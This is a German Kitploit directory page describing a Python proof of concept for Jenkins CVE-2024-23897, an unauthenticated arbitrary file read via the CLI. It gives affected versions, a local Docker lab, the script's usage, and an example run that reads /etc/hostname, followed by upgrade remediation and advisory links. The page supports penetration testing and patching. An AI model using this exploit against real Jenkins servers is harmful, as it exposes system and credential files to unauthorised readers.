Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Jenkins-CVE-2024-23897 — Python-PoC für Jenkins CVE-2024-23897 – beliebiges Dateilesen über die CLI, das eine nicht authentifizierte Dateioffenlegung mit mehreren Exploit-Methoden ermöglicht. | Kitploit
Tools/GitHubGitHub/abraxa5/jenkins-cve-2024-23897
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsRed Teaming
GitHubabraxa5/jenkins-cve-2024-23897

Jenkins-CVE-2024-23897

Python-PoC für Jenkins CVE-2024-23897 – beliebiges Dateilesen über die CLI, das eine nicht authentifizierte Dateioffenlegung mit mehreren Exploit-Methoden ermöglicht.

Repository anzeigenWebseite
111vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Jenkins CVE-2024-23897 PoC

Ein Proof-of-Concept (PoC) für CVE-2024-23897, eine Sicherheitslücke zum beliebigen Auslesen von Dateien in der integrierten Befehlszeilenschnittstelle (CLI) von Jenkins. Sie ermöglicht nicht authentifizierten Angreifern mit der Overall/Read-Berechtigung, beliebige Dateien auf dem Dateisystem des Jenkins-Controllers auszulesen.

Betroffene Versionen

  • Jenkins-Versionen <= 2.441
  • Jenkins LTS-Versionen <= 2.426.2

Einrichten einer anfälligen Instanz

Starten Sie eine lokale anfällige Instanz mit Docker Compose:

root@kitploit:~
cd docker
docker compose up -d

Die Instanz ist unter http://localhost:1234 erreichbar

Ausnutzung

root@kitploit:~
❯ python CVE-2024-23897.py --help
usage: CVE-2024-23897.py [-h] [--url URL] [--file FILE] [--method {1,2,3}]

Jenkins CVE-2024-23897 file-read PoC

options:
  -h, --help        show this help message and exit
  --url URL         URL for Jenkins instance (default: http://localhost:1234)
  --file FILE       File to read (default: /etc/hostname)
  --method {1,2,3}  The method to use [connect-node(1), who-am-i(2), or help(3)] (default: 1)

Beispiel

root@kitploit:~
❯ python CVE-2024-23897.py --url 'http://127.0.0.1:1234/' --file '/etc/hostname'
[i] Vulnerable to CVE-2024-23897 (Jenkins v2.441 <= 2.441)
[*] Target URL http://127.0.0.1:1234/cli?remoting=false
[*] Attempting to read /etc/hostname
[i] Download request done
[+] Found data, printing...


ERROR: No such agent "jenkins_vuln_instance" exists.

[i] Upload request done
[i] All threads completed

Das Skript kann beim Lesen größerer Dateien aufgrund von Nebenläufigkeit und Verbindungszeitüberschreitungen Probleme haben. Weitere technische Details und eine Schritt-für-Schritt-Anleitung zur Sicherheitslücke finden Sie in meinem Blogbeitrag zum Thema.

Behebung

  • Upgrade auf Jenkins 2.442 oder LTS 2.426.3
  • Wenden Sie temporäre Workarounds an, wie im Jenkins-Sicherheitshinweis beschrieben.

Verwandte Links

  • Sonar Source | Excessive Expansion: Aufdeckung kritischer Sicherheitslücken in Jenkins
  • Jenkins Security Advisory - 2024-01-24
  • Qualys ThreatPROTECT | Sicherheitslücke zur Remotecodeausführung in Jenkins Core (CVE-2024-23897)
  • CVE-2024-23897: Bewertung der Auswirkungen der Sicherheitslücke zum Dateileck in Jenkins – Horizon3.ai
Tool herunterladen